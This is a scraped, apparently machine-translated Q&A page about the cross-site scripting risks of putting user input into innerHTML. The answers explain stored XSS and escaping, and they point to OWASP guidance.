All geek questions in one place

Vulnerabilities allowing user to define innerHTML

Let's say I have a <textarea> and <div> element, and when the user puts html, CSS or whatever they want) in the text box, then their input is set as innerHTML in the <div> using javascript.

What are the vulnerabilities that allow a user to define the contents of a <div> element?

+6
source share
4 answers

If the content they enter does not leave the page, there is no risk than they edit the DOM via firebug or the chrome inspector. If you take the input and then show it as it is, this is a huge security risk, especially when other users are on your website.

+3
source

Well, if you encode the content so that any javascript that is not there executing, it should be safe.

If you do not, the user can download javascript, which will be executed the next time another user views this page.

I want to change my answer to take into account @Brigham's comments. Escape only works reliably if you are dealing with innerHTML of something like a div tab, if you are dealing with a user-generated value as an attribute or in a script tag, then escaping / encoding will not work.

I will tell you about the OWASP XSS guide (which @Brigham originally caught my attention) for more information: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#Untrusted_Data

+1
source

The user can perform cross-site scripting. It can enter client-side malware

Take a look at http://en.wikipedia.org/wiki/Cross-site_scripting

0
source

All they want can include the <script> , which pulls the .js file from its own server. Then, if you show this content to another user, the script can do all kinds of things to extract information from an unsuspecting user.

0
source

Source: https://habr.com/ru/post/886933/

More articles:


All Articles